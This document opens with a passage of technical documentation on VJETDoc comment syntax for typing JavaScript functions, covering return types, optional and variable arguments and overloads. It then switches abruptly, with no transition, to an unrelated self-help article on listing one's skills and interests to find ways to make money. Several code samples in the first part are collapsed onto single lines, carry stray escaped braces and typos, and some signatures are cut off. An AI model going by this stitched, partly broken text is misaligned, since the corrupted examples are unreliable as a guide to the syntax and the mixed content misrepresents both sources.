Function-Declaration: [Type] SimpleName "(" [Arguments] ")" ["throws" Throws]
Function-Ref: "(" Function-Declaration ")"
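Putting the suffixes above together, a single VJETDoc can declare required, optional, and variable arguments. The signature below is a hypothetical illustration of the grammar, not taken from the VJET sources; since the doc comment is inert to a plain JavaScript engine, the code also runs as ordinary JavaScript:

```javascript
// "String?" marks an optional argument; "String..." marks variable arguments
//> String greet(String name, String? greeting, String... extras)
function greet(name, greeting) {
  var msg = (greeting || "Hello") + ", " + name;
  // Arguments beyond the declared ones correspond to the String... part
  for (var i = 2; i < arguments.length; i++) {
    msg += " " + arguments[i];
  }
  return msg;
}

greet("Ada");                      // "Hello, Ada"
greet("Ada", "Hi");                // "Hi, Ada"
greet("Ada", "Hi", "and", "Bob");  // "Hi, Ada and Bob"
```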
Function Ref and Function Expression
The last syntax, Function-Ref, allows us to declare a function itself as the return type of another function, or as the type of another function's argument(s). The parentheses are used as a grouping mechanism for clarity and are part of the required syntax. When we talk about a function expression, we mean a function that is declared as an expression. This expression could be assigned to a variable, passed as an argument to some other function (like a callback), or even returned from another function (possibly a construction-style pattern).
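As a sketch of the Function-Ref syntax, a callback argument can be documented by wrapping the callback's own declaration in parentheses. The doc line below is an illustration of the grammar, not taken from the VJET sources, and the code runs as plain JavaScript:

```javascript
// The second argument is itself a function: a Function-Ref in the doc,
// written as (void cb(Object item))
//> void forEachItem(Array items, (void cb(Object item)))
function forEachItem(items, cb) {
  for (var i = 0; i < items.length; i++) {
    cb(items[i]);
  }
}

var total = 0;
forEachItem([1, 2, 3], function (n) { total += n; });
// total is 6
```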
Typing the return type of a function
Remember that a VJETDoc can be placed before or after the function keyword in our definition. We can use the < or > to say what direction our Vjet declaration should apply to. Let's try some simple examples where we are simply defining the return type of a function.
//> Date now()
function now(){
   return new Date ;
}

function now2() { //< Date now2()
   return new Date ;
}

/*> Date now3() ;
  * Returns the current date */
function now3() {
   return new Date ;
}

function now4(){ /*< Date now4() ; return the current Date */
   return new Date ;
}

var d = now() ; //< Date
d = now2() ;
d = now3() ;
d = now4() ;

var out = vjo.sysout.println ;
out(now()) ;
out(now2()) ;
out(now3()) ;
out(now4()) ;
console>
Tue Jan 18 2011 17:02:14 GMT-0800 (PST)
Tue Jan 18 2011 17:02:14 GMT-0800 (PST)
Tue Jan 18 2011 17:02:14 GMT-0800 (PST)
Tue Jan 18 2011 17:02:14 GMT-0800 (PST)
In these last examples, we could easily replace the return type Date with String or Number, for example, since those are also valid types to declare with. Of course, we would need to change the return expression to match the declared type.
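For instance, swapping in Number and String return types works the same way; the sketch below (plain JavaScript, with invented names) keeps each doc type and its return expression in agreement:

```javascript
// Number return type: the return expression yields a Number
//> Number biggest(Number a, Number b)
function biggest(a, b) {
  return (a > b) ? a : b;
}

// String return type: the return expression yields a String
//> String describe(Number n)
function describe(n) {
  return n + " is " + ((n % 2 === 0) ? "even" : "odd");
}

biggest(10, 20);  // 20
describe(7);      // "7 is odd"
```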
Typing the arguments and return type of a function
We can also type the arguments that a function expects. The following examples combine functions with a return type and typed arguments.
//> Date getDate(String) function getDate(mmDDyyyy){ return new Date(mmDDyyyy) ; } //> Date getDate(String mmDDyyyy) function getDate(mmDDyyyy){ return new Date(mmDDyyyy) ; } //> Date f(String) function getDate(mmDDyyyy){ return new Date(mmDDyyyy) ; } //> Date f(String o) function getDate(mmDDyyyy){ return new Date(mmDDyyyy) ; }
Function and argument names matching VJETDoc?
We can see that from a typing perspective we really care about the return type and what the argument type is. Thus, from the VJETDoc perspective, it is not required to have the function name or argument name(s) match between the comment and the actual function implementation. In the case of the argument, the argument name can actually be omitted. We in general, keep the names matching (reads better etc...) and always include argument names. Also, keeping them in sync is valuable when you start thinking about generated documentation that would come from just your Vjet type information. In those cases it's a good idea to have meaningful/unique names for your functions and to include the meaning/intent of functions arguments supplied. There are cases when you are typing a function expression that there is no name of the function. This is another reason we relax the requirement that names match.
More about Function Expressions and their usage
How about function expressions? We already saw a function expression typed and assigned to a variable (global or local). We also have the cases where a function expression can be passed as an argument, be assigned to an Object Literal member or even be returned from another function. Vjet structured types also use function expression to assign to globals, properties and prototypical properties. We basically then have Function declaration -- function max(a, b) { ... } and function expression function(a, b) { ... } and new Function('a', 'b', '...'). Function expressions can be created using the function keyword or by using the Function constructor. We include the Function constructor style for completeness since in almost all JavaScript you see you may not come across it. However, you will see function declarations and function keyword style usage all over the place.
Calling one function with another function as argument
The following example shows 4 flavors of passing a function as an argument to another function.
//> void dateProvider( (void f(Date)) needsAdate) function dateProvider(needsAdate) { needsAdate(new Date) ; } //> void sayDateDay(Date date) function sayDateDay(date) { var day = date.getDay() ; vjo.sysout.println(day) ; } var sayDateDay2 = sayDateDay ; //< void sayDate(Date date) // we will now call dateProvider with: // 1. Our declared function sayDate // 2. Our function assigned to a local variable sayDate2 // 3. A function expression using keywork function // 4. A function expression using the Function constructor dateProvider(sayDateDay) ; // declared function dateProvider(sayDateDay2) ;// function from local variable dateProvider( // function expression from function keyword //> void function(Date date) function(date){ var day = date.getDay() ; vjo.sysout.println(day) ; } ); dateProvider( // function expression from Function constructor //> void function(Date date) new Function( 'date', 'var day = date.getDay() ; vjo.sysout.println(day) ;') );
console>
2.0
2.0
2.0
2.0
A function returning a function
We can type the return type of a function with VJETDoc.
/*> (boolean f(int)) maxer(int max) ; * Our function generator will return a function that will return * true if the passed in value is greater than max, else returns false */ function maxer(max) \{ //> boolean f(int) ; this is the function we return function f(value) { var mymax = max ; //< int return value > mymax ; \} return f; \} var out = vjo.sysout.println ; var mymaxer10 = maxer(10) ; //< boolean f(int) out(mymaxer10(9)) ; // should be false, 9 < 10 out(mymaxer10(11)) ; // should be true, 11 > 10
console>
false
true
Typing a function in an Object Literal
A function can be assigned to the member name in an Object Literal. Since the member name is the actual function name, we use the function expression syntax.
var contract = { rate: 22.45, //< Number location: 'Boston', //< String open: true, //< boolean //> boolean isCostly() isCostly: function(){ return this.rate > 30.00 ; } } var costly = contract.isCostly() ; //< boolean var out = vjo.sysout.println ; out(costly) ; // false. rate is < 30.00 contract.rate = 58.70 ; out(contract.isCostly()) ; // true. rate is > 30.00
console>
false
true
Function Assignment
We saw where we declared a function and assigned it to a local variable in a single statement. This was a convenience Vjet supports (kind of a 2-for-1) declaration; you get to declare the function and variable in one shot. We can however, declare a variable (local or global) and in another statement assign it a function.
var max ; //< Number max(Number a, Number b) function f(a, b) { //< Number max(Number, Number) return (a > b) ? a : b ; } max = f ; // should be ok since function signatures are compatible var out = vjo.sysout.println ; out(f(10, 20)) ; out(max(10, 20)) ;
console>
20.0
20.0
Note that we should be able to use the force-cast VJETDoc style to help us reduce the amount of physical typing we do. We could define the function first, which gives us a better type blueprint to verify against. We can then simply say the variable, max, is that type. The example following shows this approach.
//> Number f(Number, Number) function f(a, b) { return (a > b) ? a : b ; }; var max ; //<< ; we don't need to retype the type comment var out = vjo.sysout.println ; out(f(10, 20)) ; out(max(10, 20)) ;
console>
20.0
20.0
Functions and Globals
Just as we were able to assign a function expression to a local variable, we use the exact same VJETDoc syntax when assigning to a global variable.
Optional Arguments
An optional argument means it can be omitted. The syntax for identifying optional arguments: Type-Name "?" (the type name followed by a question mark) Examples of the optional argument w/type are: Date?, int?, String[]? An optional argument can appear in any poisiont argument declaration. However, once an optional argument is defined a few rules must be followed:
- Any subsequent arguments must also be optional
- A special case of the last argument being a variable-argument is allowed
All of the following are valid declarations using optional arguments:
//> void f(int?) //> void f(int, String?) //> void f(int, String, Date?, Date?) //> void f(int?, String?) //> void f(int?, String...) //> void f(int, String?, Date...)
The following are examples of invalid declarations using optional arguments. The issues will be with optional args must be consecutive and a consecutive set of optional args can have the last argument being var-args:
//> void f(int?, String) //> void f(int, String?, Date) //> void f(int?, String..., Date?)
A key to understanding arguments in general is to think that each argument is a column. Each column has a type. In the case of var-args, you can think of a never-ending set of columns each with the type. The notion of final applies to the argument declaration. If the final is on a var-args then all of those columns will be final. The final qualifier does not change any of the previously mentioned ways the arguments are declared. Let's go through some examples to see exactly what a given signature actually means. One technique is to flatten out the signature so that each permutation is directly expressed with its own comment. When doing this flattening, we need to understand how to expand a given argument.
//> void f() ; no interpretation necessary f() ; f(1) ; // error since f() takes no arguments //> void f(int, String) f(0) ; // error since f() takes 2 arguments f(1) ; // error since f() takes 2 arguments f(1, 'hello') ; // ok, 2 args and they are compatible types f(1, 'hello', 2) ; // error since f() takes 2 arguments //> void f(int?) f() ; // ok since we handle 0 args f(1) ; // ok since if we have 1 arg, it must be an int f(1, 2) ; // error since f() can take 0-1 arguments //> void f(int?, String)
This signature is invalid. If we have an optional argument, any following arguments must be also optional, or end with a var-args.
//> void f(int?, String?) f() ; // ok f(1) ; // ok f('abc') ; // error - we must have concrete previous optional args f(1, 'abc') ; // ok f(1, 'abc', 2); // error - function takes at most 2 arguments //> void f(int, String?) f() ; // error - f() takes 1 or 2 arguments f(1) ; // ok f(1, 'abc') ; // ok f('abc') ; // error - String not compatible with int f(1, 'abc', 2); // error - f() takes 1 or 2 argument
Let's take a simple optional-args declaration and flatten its permutations out into a series of equivalent VJETDocs. The ability to have more than 1 VJETDoc per function is called overloading, is supported by Vjet and is described later in this document.
//> void f(String?
is the same as
//> void f() //> void(String) //> void f(int, String?)
is the same as
//> void f(int) //> void f(int, String) //> void f(int?, String?)
is the same as
//> void f() //> void f(int) //> void f(int, String)
Variable Arguments
JavaScript naturally supports variable arguments. The full set of arguments is always available via the built-in variable, "arguments". Thus a JavaScript programmer will then look at the number of arguments (and often use the typeof or instanceof operators) on the arguments to determine how to process the varying amount coming in. From a typing standpoint, we want to identify that a variable number of arguments is possible and what type they should be. The syntax for identifying variable arguments is: Type-Name "..." (the type name followed by 3 dots) ex: Date..., int..., String[]... etc... If variable arguments are specified a few rules apply:
- There must be only one in a given function signature
- Must be the last position of the set of arguments
- It is possible to have just variable arguments and no preceding arguments
void f(Number...) void f(Number... ids) void f(boolean, Number...) void f(boolean ok, Number... ids)
examples of incorrect variable arguments:
void f(Number..., int) - variable arguments must be in last position void f(Number..., Date...) - only one variable arguments per declaration void f(Number..., Date?) - variable arguments must be in last position
We follow with some variable arguments declarations with sample of valid and invalid JavaScript statements using that function.
//> f(int...) f() ; // ok f(1) ; // ok f(1, 2, 3) ; // ok f(1, 2, 'abc) ; // error - 'abc' is not an int //> f(String..., int)
Signature is invalid. If we have var-args, it must be the last declaration.
//> f(int, String...) f() ; // error - f() takes 1 or more arguments f(1) ; // ok f(1, 'abc') ; // ok f(1, 'abc', 'jdk') ; // ok f('abc', 'jdk') ; // error - first argument must be int f(1, 'abc', 2) ; // error - int (2) is not compatible with String //> f(int?, String...) f() ; // ok f(1) ; // ok f('abc') ; // error first arg, if any must be int f(1, 'abc') ; // ok f(1, 'abc', 'xyz') ; // ok f(1, 'abc', 2) ; // error - int (2) is not compatible with String
ll of the following are valid combinations of fixed-args, optional-args and var-args:
//> void f() //> void f(int) //> void f(int, String) //> void f(int?) //> void f(int?, String?) //> void f(int, String?) //> void f(int, String, Date?) //> void f(int...) //> void f(int, String...) //> void f(int, String?, Date...) //> void f(int?, String?, Date...)
Multi-type Arguments
VJETDoc syntax supports the notion of a single argument having more than one valid type. This can be expressed in an overload as such:
//> void f(int) //> void f(String
We see that the first argument can be an int or String. We can also declare this scenario as:
//> void f({int|String})
We allow for this syntax to enable the easier typing of functions that often vary by one argument but have multiple arguments after them. Also, existing libraries such as Dojo have many functions related to DOM processing that nearly always take a Node or String type. We can cut down on the amount of physical typing and space required to declare such functions. A multi-type argument is always a physical position in the signature and in the cases with rules regarding optional-args and variable-args is the same as if the argument only supported one type. The following are example of illegal VJETDoc regarding multi-type arguments, optional-arguments and variable-arguments.
//> void f(String..., {int | boolean
//> void f(int?, {int | boolean}
optional arg must be followed by another optional arg or end with a variable-args
Relationship of physical function declaration and VJETDocs
JavaScript always has the internal built-in arguments available for a function to access. Thus, not all functions that really take arguments formally declare them. What set of arguments a function can really handle is based on its internal implementation and not necessarily the arguments in the function(...) portion of the declaration. If this is so, then should VJETDoc about functions require the physical functions number of arguments to match? The answer is no. The following example shows how two functions with the same Vjet signature have differing number of arguments in their physical declaration but have exactly the same behavior.
//> Number sumTwo(Number, Number) function sumTwo(){ var total = 0 ; // we use internal built-in variable arguments if (arguments[0]) total += arguments[0] ; if (arguments[1]) total += arguments[1] ; return total ; } //> Number sum(Number a, Number b) function sum(a, b){ var total = 0 ; // we use the formal arguments from the function declaration if (a) total += a ; if (b) total += b ; return total ; } var out = vjo.sysout.println ; out(sumTwo()) ; out(sumTwo(1)) ; out(sumTwo(1, 2)) ; out(sumTwo(1, 2, 3)) ; // third arg is ignored out('-------------') ; out(sum()) ; out(sum(1)) ; out(sum(1, 2)) ; out(sum(1, 2, 3)) ; // third arg is ignored
console>
0.0
1.0
3.0
3.0
0.0
1.0
3.0
3.0
Also, a function that is declared as vjo.NEEDSIMPL never defines any arguments, yet you can declare the argument(s) types in the VJETDoc . vjo.NEEDSIMPL is a placeholder value when declaring an abstract Vjet type function. Abstract types/functions are described in another document. Suffice to say that the placeholder function does not have any arguments.
vjo.ctype('Ex') .protos({ add: vjo.NEEDS''IMPL, //< Number add(Number, Number) sum: vjo.NEEDS''IMPL //< Number add(Number...) }) .endType();
Can a physical function declaration, define more arguments than are in the VJETDoc? Yes. Arguments beyond those declared in the comment are given the type Object.
vjo.ctype('abc.Ax5') //< public .props( { //>public void main(String... args) main : function(args){} //> void f(int) function f(a, b, c) { a++ } } }) .protos({ }) .endType();
Overloaded Functions
In Object Oriented programming, there is a concept called overloading. Without delving into why this is a good idea, let's say that Vjet allows you to define more than one VJETDoc to describe your function. As we saw with optional-args and var-args, you get a similar effect; more than 1 type signature is behinds the scenes in use for a single function. By allowing more than 1 VJETDoc per function, we can do similar declarations. The following function f() is overloaded with 3 function signatures. Function g(), has only 1 function signature, but handles the exact same argument combinations that f() does. If this is so, then why have overloading? Well, it turns out that there are combinations of arguments that we could not be able to describe with optional-args and/or var-args.
//> void f() //> void f(int) //> void f(int, String) function f() { } //> void g(int?, String?) function g() {
The following overloaded function shows that not only can we have differing argument combinations but that we also can have differing return types.
//> Number add(Number, Number) //> String add(String, String) function add(a, b){ return a + b ; }
add(10, 20) ; add('cat', 'bird') ;
Note that having more than 1 VJETDoc per function does not produce a permutation of argument types at each position. Each signature is evaluated itself for completeness and does not impact any other signatures that are present. In our last example we would not allow the following:
add(10, 'cat') ; add('cat', 10) ;
It's possible to have overloads where some signatures return a type and others don't (they return void)
More on function signatures
We can have cases where a function may or not return something based on what arguments it takes. When we have these conditions, it is not possible for Vjet to determine if you have properly coded your function implementation to honor such permutations. It will however, verify that if you do have a return, it will not violate the known return types (the function could be overloaded). In the following example, the return new Date, would be an error since the return types for f() are either int or String.
//> int f(boolean)//> String f(String) function f(a) \{ if (typeof a == 'boolean') return 10 ; // ok from int f(boolean) if (typeof a == 'string') return 'xxx' ; // ok from String f(String) return new Date ; // should fail since neither int or String }
Access Control with Overloading
You must have the same access control with all of your overloaded signatures. The following are examples of overloading and having the same access control:
//> public void f() //> public void f(int, String) function f() { ... } //> private int f() //> private void f(Number) function f() {... }
The following are examples of illegal overloading due to mismatched access control. Note that having no access control means all of your overload signatures must also have no access control:
//> void f() //> public void f(String) function f() { ... } //> public int f() //> private String f(Number) function f() { ... }
Return types ambiguous for same args
When you are defining your overloads, you should be thinking that each signature is unique. Thus when calling the function for a given set of arguments that match that signature you get the return type associated with that signature.
We have seen that with optional arguments and/or variable-arguments, we get an implied overload. Thus a single signature can really expand to multiple signatures behind the scenes. Because of this you need to make sure that at the single declaration level you remain unique.
Here are some example where you get ambiguous bindings:
//> void f(int) //> String f(int?
We can see that String f(int?) is really the same asString f() String f(int)
Since we already have a signature for f(int) saying it should return void, we now have a collision. | http://wiki.eclipse.org/index.php?title=VJET/Typing_Functions_with_VJETDoc&diff=323827&oldid=323429 | CC-MAIN-2019-43 | refinedweb | 3,824 | 54.73 |
CGTalk
>
Software Specific Forums
>
Autodesk Maya
>
Maya Rendering
> Render bones?
PDA
View Full Version :
Render bones?
zoharl
01-05-2012, 10:32 AM
The script from creativeCrash that places elongated pyramids on top of the bones isn't good enough. Any creative idea for something that looks good, besides using the hardware render buffer?
hanskloss
01-06-2012, 07:05 PM
I was looking for a solution to this for the longest time. Not sure why they decided not to make bones a renderable object. Pretty lame if you ask me. :rolleyes:
zoharl
01-06-2012, 09:23 PM
The situation is that bad, ah?
Well wait a minute, I'm looking at the bones in the view port, and what's the problem to draw them one-to-one with all the colors and stuff (bit by bit, I'll rewrite maya ... ;) )?
How about making it even better, such as putting real bones (not real-real, real - graphics real...) exactly on top of them? It should be a blast. But surely someone must have done such a thing already?
thematt
01-06-2012, 09:39 PM
would viewport 2.0 render them? it render camera for exemple from what I saw.
Clappy3D
01-06-2012, 09:39 PM
I think your plugin Maya business will be a smashing success. Now get to work.
hanskloss
01-07-2012, 12:01 AM
It's been done before in Mirai. Bones in Mirai were built off of polygonal primitives thus were renderable. It amazes me how many people are asking for features/tools that have been around for years, but...not in Maya. I truly wish ADSK would have taken the time to do a real in depth analysis of this application.
zoharl
01-07-2012, 12:30 AM
This is getting ridicules!
Well here is my create_bones.py
Put the bone.ma
in the script dir, or create your own model named bone inside the scene. Select a joint and run:
import create_bones
reload(create_bones)
create_bones.do()
It would create bones for the joints and bind them:
I'm opened to suggestions (hierarchy colors?), or better bone.ma.
cgbeast14
01-20-2012, 11:49 PM
whipped this up for you to try out.
current working code [MEL]
/*usage select root joint and run script*/
//select all children of parent
string $rootJoint[] = `ls -sl -fl`;
select -hi;
string $sel[] = `ls -sl -fl`;
string $cpm = `createNode closestPointOnMesh`;
select -cl;
group -em -n "skelGeo";
for ($i=0; $i<size($sel); $i++){
//Evaluate for joints only
if (`nodeType $sel[$i]` == "joint"){
//create sphere at each joint
vector $pos = `xform -q -ws -t $sel[$i]`;
vector $rot = `xform -q -ro $sel[$i]`;
polySphere -sx 10 -sy 10 -n ($sel[$i]+"_geo");
float $jointScale = `jointDisplayScale -q`;
float $radius = `getAttr ($sel[$i]+".radius")`;
$radius = ($radius/2)*$jointScale;
xform -ws -t ($pos.x) ($pos.y) ($pos.z) -ro ($rot.x) ($rot.y) ($rot.z) -scale $radius $radius $radius ($sel[$i]+"_geo");
makeIdentity -apply true -t 1 -r 1 -s 1 -n 0 ($sel[$i]+"_geo");
if ($sel[$i] != $rootJoint[0]){
//create lengths to connect child nodes
string $fParent = firstParentOf($sel[$i]);
float $jointScale = `jointDisplayScale -q`;
float $radius = `getAttr ($fParent+".radius")`;
$radius = ($radius/2)*$jointScale;
$cone = `polyCone -sx 4 -h 2 -n ($fParent+"_geo_length")`;
move -r -y (2);
makeIdentity -apply true -t 1 -r 1 -s 1 -n 0 $cone;
ResetTransformations;
//get Position of Parent
vector $pos = `xform -q -ws -t $fParent`;
float $radius = `getAttr ($fParent+".radius")`;
xform -ws -t ($pos.x) ($pos.y) ($pos.z) -scale $radius $radius $radius ($cone);
select -r $sel[$i];
select -add $cone;
aimConstraint -offset 0 0 0 -weight 1 -aimVector 0 1 0 -upVector 0 1 0 -worldUpType "scene";
select -r ($sel[$i]+"_geo");
string $shapeNode[] = `ls -sl -dag -lf`;
connectAttr -f ($shapeNode[0]+".outMesh") ($cpm+".inMesh");
vector $pos = `xform -q -ws -t ($cone[0]+".vtx[4]")`;
setAttr ($cpm+".inPositionX")($pos.x);
setAttr ($cpm+".inPositionY")($pos.y);
setAttr ($cpm+".inPositionZ")($pos.z);
vector $pt = getAttr ($cpm+".position");
xform -ws -t ($pt.x) ($pt.y) ($pt.z) ($cone[0]+".vtx[4]");
select -r -hi $cone;
DeleteConstraints;
parent $cone (shortNameOf($fParent)+"_geo");
}
}
}
//clean up nodes
delete $cpm;
for ($i=0; $i<size($sel);$i++){
parent ($sel[$i]+"_geo") "skelGeo";
select -r $sel[$i];
select -add ($sel[$i]+"_geo");
ParentConstraint;
}
I wasn't sure how you'd want the geometry to be organized so that's pretty flexible for changes. Did you need it actually skinned? it seems like parenting would give a better result in this particular case but I dont know what the particular needs are. Anyway I'm gonna revise some of the code and I'll be posting it to Creative Crash as "Beastly Bones" for anyone whos interested
[edit] I decided to update it to set up a parent constraint from the bone to geometry so you can try it out and see if that works for your needs. Also I corrected a parenting issue for the 'length' geometry. All geo should be dumped into a group called skelGeo. Let me know how it works for you!
zoharl
01-21-2012, 05:48 AM
If you can, please show a rendered image of your skeleton, and put your code under code tags, and make indented, so it would be more readable.
cgbeast14
01-21-2012, 09:20 PM
Ok I reformatted the code and posted a render image based off a maya generated skeleton.
I caught a little oversight in there about the 'joint size' value and I've updated it in the code. Admittedly there's still a small bug in there which is adjusting the cones pivot point to replicate the exact position I'll mess with it a little later when I get some time.
hanskloss
01-22-2012, 02:35 PM
How about making the bones gray, white, blue or green? Something that would stand out even when not rendering them.
or watch some of these videos:
cgbeast14
01-25-2012, 09:02 PM
Well in the case that its not rendered, bones do have a drawing override that allows you to change the color to make them more visible. or alternatively you could also place them in a layer and apply a color to that which would change the drawing color (joints, curves, etc)
CGTalk Moderation
01-25-2012, 09:02 PM
This thread has been automatically closed as it remained inactive for 12 months. If you wish to continue the discussion, please create a new thread in the appropriate forum.
vBulletin v3.0.5, Copyright ©2000-2015, Jelsoft Enterprises Ltd. | http://forums.cgsociety.org/archive/index.php/t-1027826.html | CC-MAIN-2015-18 | refinedweb | 1,094 | 72.76 |
How to create excellent money-making plans that actually work
Do you want to make more money online, or even offline? Sure, we all do. Coming up with a method to do this in a way that works is something that a lot of people have trouble with, though. Lots of pages will claim to tell you how to make money, but usually all they're really offering is some product, service, or gimmick that will profit them, not you. That's not the purpose of this Hub.
We're going to examine how to take the question of how to make money, come up with an effective plan of action, and allow you to find ways to implement that plan. First off, let's look at the question itself. "How can I make money?" This is really just a way of re-stating the idea, "I want or need money" as a question. Or to be more precise, "I want to establish a relationship with the rest of the world in a way that causes it to give me money". This is the goal, and most people invest themselves, their effort, and their time in trying to satisfy that goal.
But when that's as far as it goes, it seldom works. Of course it doesn't. It doesn't work because when people do that, they're creating a situation where their objective is just to take away from the world, and any contribution back into the world is merely incidental, or an unavoidable necessity. That not only doesn't work - most systems don't want people taking from them without giving anything back in return - but it also generally results in the world becoming an even worse place, because these people are subtracting value from it. They are attempting to add value to their own lives by taking value away from the rest of the world. Most people try to do this, from the very powerful people in the world to the people on the street who ask you for pocket change. It doesn't genuinely work (and so it's a waste of your time), and it makes the world a more weary, valueless place. It's also a very negative statement about yourself to make. The choice to do that is really just a way of acting on the statement, "I am a person with nothing to offer, who can only take value away from the world." And that's never true. It's an unfair statement about yourself, and can only make you miserable.
Some people, like the person on the street who begs you for pocket change, do it because they genuinely have no option. But usually, there are plenty of other, better options. Nearly always, the hard part is spotting them. This is usually because we overlook our own value - the things that we have and know and can offer or provide to others - and because we're not used to thinking carefully and creatively about the opportunities we have to offer them to others in a way that benefits ourselves and them as well.
Imagine for a moment going through the job offers in the classified ads of a newspaper. Chances are that you're not going to find many offers like, "Urgently needed - Someone to do absolutely nothing. $5,000 a month, with benefits. Must be available to start immediately." Of course you're not. You wouldn't offer someone $5,000 a month and benefits to do absolutely nothing for you, and generally neither will anyone else. Expecting someone else to give something away without ever getting any value in return for it is unrealistic.
Value is the key
Value drives the entire process. Lots of people fall in love with the idea of "making money on the internet" because they think that it's a way to get value without giving value. Sometimes it is, because a lot of systems on the internet are just starting out. They may pay value out without getting value in return. These are the systems that are working from an unrealistic model, and it's costing them. Eventually, those costs will cause them to either make a correction in their approach, or go under completely. So look at systems like that as flukes, that won't be around for very long. You could devote your life to looking for those flawed systems as they appear, finding loopholes and exploiting them before they're corrected, but then you have turned finding and exploiting loopholes like that into your full-time job. It's not only very uncertain, but as systems like that stop working - as they must - you'll have to devote more and more of your time and effort to finding new ones, and hoping that they pay out before they go under themselves.
Let's concentrate on finding value within yourself, first of all. This will allow you to find things you can offer to the world, and that the world will be willing and able to give you value in return (in the form of money) for providing.
When it comes to this Value In, Value Out transaction, lots of people tune it out. This is usually because they have been conditioned to think that when they provide something of value to the world, by definition it means that it has to be something they don't enjoy doing, or find hard, miserable, or grueling. Nothing could be further from the truth. I'm providing value to you right now by writing this, and I'm enjoying every moment of it. Personally, I find it rather addictive. But most of the world believes that providing Value Out means sacrificing something, and that in order for it to be worth a lot, it must cost them a lot. Again, this isn't true. I'm providing value by sharing my experience and thinking with you in a way that will allow you to make more money. It involves giving up some of my time to do it, but it gives me value by providing money and by allowing me to share better ways of looking at the world with others, and by doing so I'm investing myself in making the world a better place. That's very enjoyable and important to me, so I get a lot out of it. I get very frustrated at the state of the world sometimes, and so I consider this a constructive means of recreation on my part, as well as a money-making opportunity.
So let's take a look at what you can offer to the world as Value. You've been on the planet for a number of years; you must have spent that time doing something. What has it been? Try this: grab a pencil and paper, and jot down a list of things you're good at. Seriously. Stop reading for a moment, and get a pen and paper.
Finding the value you have
Okay, write the words "Value Out" at the top of that paper. We're going to write down some of the big things you know about. Some of the things you're good at. You'll probably think of more stuff later, but this is for now. Don't worry about making them only things that you could make money doing; we'll worry about that later. What can you do? Do you know about fashion? Can you juggle? Have you read a lot? Do you watch a lot of television? What have you been doing with your time in life? Also include the things you're particularly good at. Can you write? Draw? Paint? Edit? Program? Spend at least five minutes thinking of stuff and jotting it down for your list. This will help you make more money, so I think five minutes is worth it. Don't you?
Learning what you value
Alright, now you should have your Value Out list. There are probably at least fifteen or twenty things on it, many of them with no immediate relationship to making money. Underneath your Value Out list, I want you to write Value In. This is the header for your second list, and it won't take as long. We're going to look at your life for a second and, by considering how you've been choosing to spend your time, get some ideas about what's important to you. You can use your first list as a way to get ideas about what your Interests and Motivations are, by the way. You've been there with you throughout your entire life - you should have some idea of what motivates and interests you. If you get stuck, you might want to sneak a peek at your HubPages tag cloud in your Profile area. HubPages keeps track about what you spend your time on, at least here on the site. You may also want to glance at your User Interests on any blog you have, and borrow some ideas.
Why are we doing this? Because often when people pursue money, what they're really seeking is Value. Value, in the form of money. They chase after money, they invest their whole lives into it, and they make themselves miserable in the process. This is because they're doing what gives them money, not Value, and so they're in a miserable, boring situation that only gives them money. And usually, they're not very good at it, because it's almost impossible to fully apply yourself to something that doesn't matter to you in and of itself.
We're going to get past this by looking for things you actually find Value in. Leave money completely out of it for a second. Where there is actual Value, there is always an opportunity to convert it into money, because the purpose of money is to represent value. This is why people often mistake money for value, by the way. It's really just a placeholder. So write down on your Value In list what's important to you. (Don't write "Money", unless you're genuinely fascinated by how currency is manufactured.) Write down the things you find rewarding. Is it building a relationship with people? Helping someone to make their life better? (That's a big one for me.) Is it computer games, books, or movies? Avoid things that you would like to matter to you someday, and stick with what you've found that actually makes you happy. Are you a collector? An enthusiast? A trivia buff? What have you found that makes you happy in life? If you were independently wealthy and money didn't matter - how would you spend your time? In short, what do you find rewarding?
Alright, now you should have your Value Out list, and your Value In list. (If you don't, stop reading for a moment and finish them before moving on.) We're going to go over them, and turn them into ways to make money. First, we're going to avoid some common mistakes.
Playing matchmaker
Who would find the stuff in your Value Out list worthwhile? Who would want what you have to offer to the world? Someone must. If you can write, for example, HubPages is a great place to start. Someone out there wants to know what you already know. The less people who have that information, the more valuable it usually is. Maybe you can create your own website or blog about it. Users with common interests will find it, join up, and you'll get ad revenue. But keep thinking, and think big. This is what you'll eventually be spending your time doing, so make it big and make it matter.
Abstracting - There's more where that came from!
We're also going to Abstract. Abstracting is the opposite of the Reducing we did above. We're going to take the Big Ideas, like Nature for example, and see if there's any other avenue of it we're missing. If you're interested in rocks, herbs, and animals, maybe you'd also be interested in ecology and marine habitats. If you are, write them down too. More items on your list will mean more opportunities to make money.
Alright, you now have a really well-evaluated list that tells you the Big Ideas about yourself. It tells what you love, and what you can do for others. Now we're going to apply it to the world, and see what kinds of opportunities we can find - or create - to trade Value that we have for money, by looking at what the world values.
Fluff - Considering what the world values
First off, most people put down "TV, movies, and games" as their interests. This is because a lot of people have no lives. By that I mean, they don't do very much with their time, and pursue those things not because they genuinely find a lot of value in them, but instead because they happen to be the closest and most easily-accessed thing around them that claims to offer them value. People, particularly people in America, don't search very hard or very far to find actual value, and have gotten used to settling for whatever's the most convenient. As a result, we have a ton of people who know a lot about The Simpsons and American Idol, but few people who know very much about anything really useful. It's true, you can find ways to make money with an extensive knowledge of Simpsons trivia - but those opportunities are few and far between, and you're more likely to spend more time and effort trying to find them than you will get back from them. So be aware that the Value most people have is usually duplicated - since it usually all comes from the same media source most of us have in common - and not only is it mostly useless, there isn't much demand for that in the world because so many people have that knowledge. We're going to call that sort of knowledge Fluff - like the part of the news when they stop telling you all the terrible things that have happened in the world today, and show you two minutes of footage about kittens playing the piano. Fun - but it doesn't usually serve much of a purpose. So as you look at your list, keep in mind which things are probably Fluff, and which are not. Fluff doesn't rule it out as a money making opportunity, but it usually means that you'll have a hard time providing it for much in return, because of Supply and Demand.
Reducing - Discovering the common denominators
Another thing we're going to do is to Reduce. When you look at your Value In and Value Out lists, look for things they have in common. If you have mineralogy, herbology, and zoology on your Value Out list, for example, they probably really reduce to an interest in Nature in general. Circle them, draw lines that link them together, and write Nature in the margin. Underline it, too. This is a Big Idea for you, and we're looking for Big Ideas for you in both lists. Look at the lists, and think about why you do those things. Answer the question, "I am really interested in ______ because..." and find out what kind of a need it fills in your life. What does it do for you? "I like to learn about rocks, herbs, and animals because... I get really frustrated living a cramped, modern life." Boil down some of the various things you have listed into what they have in common, and what they actually mean to you. Knowing what you're really about tells you a lot about where you should go with it. Often, people learn a lot they didn't recognize about themselves when they think about this. When you Reduce, and find out what you're really trying to achieve when you do what it is you love doing, ask yourself if there would be other ways of achieving the same thing, or even if there are much better ways of going about it. Many times, this will cause you to get a money-making idea instantly that had never occurred to you before.
